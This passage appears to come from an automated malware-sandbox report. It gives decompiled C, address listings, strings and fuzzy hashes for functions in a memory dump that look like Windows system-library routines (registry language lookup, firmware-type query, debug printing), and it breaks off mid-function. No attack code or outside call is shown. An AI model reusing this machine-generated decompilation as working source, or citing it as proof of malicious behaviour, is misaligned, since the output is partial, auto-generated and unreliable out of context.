0x00000000
0x00000000
0x0181545c
0x0181546a
0x0181546d
0x0181546f
0x00000000
0x0181546f
0x017be70f

Strings

InstallLanguageFallback, xrefs: 017BE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017BE68C
@, xrefs: 017BE6C0

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
Instruction ID: 1fa2028a6c33da0c5ba513b17937188640451e98349334476eff680da98cbe9b
Opcode Fuzzy Hash: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
Instruction Fuzzy Hash: B851A2B25083069BD710DF68C484BABF7E8AF89714F05092EFA85D7344EB34DA04C792

Uniqueness

Uniqueness Score: -1.00%

Function 0187E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0187E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0187BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0187BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0187AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E017F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0187A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0187A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0187A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0187A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E017D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E017CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E017CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E017D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0186FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0187e547
0x0187e549
0x0187e54f
0x0187e553
0x0187e557
0x0187e55a
0x0187e55c
0x0187e55f
0x0187e561
0x0187e567
0x0187e56b
0x0187e7e2
0x00000000
0x0187e571
0x0187e575
0x0187e577
0x0187e57b
0x0187e57c
0x0187e57d
0x0187e57e
0x0187e57f
0x0187e588
0x0187e58f
0x0187e591
0x0187e592
0x0187e592
0x0187e596
0x0187e59e
0x0187e5a0
0x0187e5a6
0x0187e61d
0x0187e61d
0x0187e621
0x0187e623
0x0187e630
0x0187e630
0x0187e7e6
0x0187e7eb
0x0187e7ed
0x0187e7f4
0x0187e7fa
0x0187e7ff
0x0187e7ff
0x0187e80a
0x0187e812
0x0187e812
0x0187e5ab
0x0187e5b4
0x0187e5b9
0x0187e5be
0x0187e5c0
0x0187e5c2
0x0187e5c8
0x0187e5c9
0x0187e5cb
0x0187e5cc
0x0187e5d5
0x0187e5e4
0x0187e5f1
0x0187e5f8
0x0187e5f8
0x0187e5d5
0x0187e602
0x0187e616
0x0187e63d
0x0187e644
0x0187e64d
0x0187e652
0x0187e657
0x0187e659
0x0187e65b
0x0187e661
0x0187e662
0x0187e664
0x0187e665
0x0187e66e
0x0187e67d
0x0187e68a
0x0187e691
0x0187e691
0x0187e66e
0x0187e6b0
0x00000000
0x0187e6b6
0x0187e6bd
0x0187e6c7
0x0187e6d7
0x0187e6d9
0x0187e6db
0x0187e6de
0x0187e6e3
0x0187e6f3
0x0187e6fc
0x0187e700
0x0187e700
0x0187e704
0x0187e70a
0x0187e70a
0x0187e713
0x0187e716
0x0187e719
0x0187e720
0x0187e761
0x0187e76b
0x0187e774
0x0187e77a
0x0187e77a
0x0187e78a
0x0187e791
0x0187e799
0x0187e79b
0x0187e79f
0x0187e7aa
0x0187e7c0
0x0187e7ac
0x0187e7b2
0x0187e7b9
0x0187e7b9
0x0187e7c7
0x0187e806
0x00000000
0x0187e7c9
0x0187e7d1
0x0187e7d8
0x00000000
0x0187e7d8
0x00000000
0x00000000
0x0187e722
0x0187e72e
0x0187e748
0x0187e74c
0x0187e754
0x0187e756
0x0187e75c
0x0187e75c
0x00000000
0x0187e75c
0x0187e758
0x0187e758
0x00000000
0x0187e758
0x0187e750
0x00000000
0x00000000
0x0187e752
0x00000000
0x0187e752
0x0187e730
0x0187e735
0x0187e73d
0x0187e73f
0x00000000
0x00000000
0x0187e741
0x0187e741
0x00000000
0x0187e741
0x0187e739
0x00000000
0x00000000
0x0187e73b
0x00000000
0x0187e73b
0x0187e722
0x0187e720
0x0187e6b0
0x0187e618
0x00000000
0x0187e618

Strings

`, xrefs: 0187E5D7
`, xrefs: 0187E670

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 47b2db64c2f73b605350b348892826e6ec8acfd2b031a3aa5d046dd24c9c6505
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 1991A1312043469FE724CE29C845B1BBBE6BF84754F18896DF6A5CB290E774EA04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 018351BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E018351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18905f0);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018353CA(0);
						return E0180D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E017D3690(1, _t117, 0x1791810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L017D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0183500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x018351be
0x018351c3
0x018351c8
0x018351cd
0x018351d0
0x018351d3
0x018351d8
0x018351db
0x018351de
0x018351e0
0x018351e3
0x018351e6
0x018351e8
0x01835342
0x01835351
0x01835356
0x0183535a
0x01835360
0x01835363
0x01835366
0x01835369
0x01835369
0x0183536b
0x0183536b
0x01835370
0x018353a3
0x018353a4
0x018353a6
0x018353ab
0x018353ab
0x018353ae
0x018353ae
0x018353b5
0x018353bf
0x018353bf
0x01835375
0x01835396
0x018353a0
0x018353a0
0x00000000
0x01835396
0x01835377
0x01835379
0x0183537f
0x0183538c
0x01835390
0x00000000
0x01835390
0x018351ee
0x018351f1
0x01835301
0x01835310
0x01835315
0x01835318
0x0183531b
0x01835320
0x0183532e
0x01835331
0x00000000
0x01835331
0x01835328
0x01835329
0x00000000
0x01835329
0x018351fa
0x01835235
0x01835236
0x01835239
0x0183523f
0x01835240
0x01835241
0x01835242
0x01835246
0x01835247
0x0183524e
0x01835251
0x01835267
0x01835269
0x0183526e
0x0183527d
0x0183527e
0x01835281
0x01835282
0x01835287
0x01835288
0x0183528a
0x0183528f
0x01835294
0x00000000
0x00000000
0x0183529a
0x0183529c
0x0183529e
0x0183529e
0x018352a4
0x018352b0
0x00000000
0x00000000
0x018352ba
0x018352bc
0x018352bc
0x018352d4
0x018352d9
0x018352dc
0x018352e1
0x00000000
0x00000000
0x018352e7
0x018352f4
0x00000000
0x018352f4
0x01835270
0x00000000
0x01835270
0x018351fc
0x018351fd
0x01835202
0x01835203
0x01835205
0x0183520a
0x0183520f
0x00000000
0x00000000
0x0183521b
0x01835226
0x0183522b
0x0183521d
0x0183521d
0x01835222
0x01835222
0x0183522d
0x00000000

Strings

Legacy, xrefs: 01835226
UEFI, xrefs: 0183521D

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
Instruction ID: b49aaca841455568e83b02c1c9beca83e7e1a2a5cc33946e9b54f4a85add4572
Opcode Fuzzy Hash: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
Instruction Fuzzy Hash: 9C516071E006099FDB15DFA8C890BAEBBF8FF89704F18402DE649EB251D671DA00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017BB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E017BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x188f7a8);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0180D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E017FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E017FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0180DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E017FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E017FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E017FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E017FA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x017bb171
0x017bb171
0x017bb171
0x017bb171
0x017bb171
0x017bb176
0x017bb17b
0x017bb180
0x017bb186
0x017bb18f
0x017bb198
0x017bb1a4
0x017bb1aa
0x01814802
0x01814802
0x01814805
0x0181480c
0x0181480e
0x017bb1d1
0x017bb1d3
0x017bb1de
0x017bb1de
0x01814817
0x0181481e
0x01814820
0x01814822
0x01814822
0x01814824
0x01814824
0x0181482a
0x00000000
0x00000000
0x01814835
0x0181483a
0x0181483d
0x0181483f
0x01814842
0x01814842
0x01814842
0x01814846
0x0181484c
0x0181484e
0x01814851
0x01814851
0x01814853
0x01814854
0x01814854
0x01814858
0x0181485a
0x0181485a
0x0181485d
0x0181485f
0x01814861
0x01814861
0x01814866
0x0181486b
0x0181486e
0x01814871
0x01814876
0x01814876
0x01814878
0x0181487b
0x01814884
0x01814884
0x00000000
0x0181487d
0x0181487d
0x01814882
0x01814889
0x01814889
0x0181488f
0x01814891
0x018148e0
0x018148e2
0x018148e4
0x018148e4
0x018148e7
0x018148e7
0x018148ed
0x018148f4
0x018148f6
0x01814951
0x01814951
0x01814953
0x01814953
0x01814956
0x01814956
0x01814958
0x01814959
0x01814959
0x0181495d
0x0181495d
0x0181495f
0x0181495f
0x01814965
0x01814969
0x018149ba
0x018149ba
0x018149c1
0x018149c5
0x018149cc
0x018149d4
0x018149d7
0x018149da
0x018149e4
0x018149e5
0x018149f3
0x01814a02
0x00000000
0x01814a02
0x01814972
0x01814974
0x00000000
0x00000000
0x01814976
0x01814979
0x01814982
0x01814983
0x01814984
0x0181498b
0x0181498d
0x01814991
0x01814993
0x01814999
0x0181499d
0x018149a2
0x018149a2
0x018149a2
0x01814999
0x018149ac
0x00000000
0x018149b3
0x018148f8
0x018148fe
0x00000000
0x00000000
0x00000000
0x018148fe
0x01814895
0x0181489c
0x018148ad
0x018148b2
0x018148b5
0x018148b7
0x018148ba
0x018148bc
0x018148c6
0x018148c6
0x018148cb
0x018148d1
0x018148d4
0x018148d8
0x018148d8
0x00000000
0x018148d8
0x018148be
0x018148c0
0x00000000
0x00000000
0x018148c2
0x00000000
0x00000000
0x00000000
0x018148c4
0x00000000
0x01814882
0x0181487b
0x01814904
0x01814906
0x00000000
0x00000000
0x01814908
0x0181490e
0x00000000
0x00000000
0x01814910
0x01814917
0x01814917
0x00000000
0x01814917
0x017bb1ba
0x018147f9
0x018147fc
0x00000000
0x00000000
0x00000000
0x018147fc
0x017bb1c0
0x017bb1c0
0x017bb1c3
0x017bb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018148AD

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
Instruction ID: 8ea44427aa7a2a9277c5bb6b1524a5582281d7a514bae0698f624133863f614a
Opcode Fuzzy Hash: c966c1d14a744dc524dd89eaac2bf87f34e31d6d06f6d639c0d2d3cac09d4f70
Instruction Fuzzy Hash: 1951E172D0025A8EEB31CF68C844BAEBBB5BF04714F1041ADDD59EB29AD7704A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017DB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E017DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x18ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E017D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01888CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E017F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E017FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E017FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
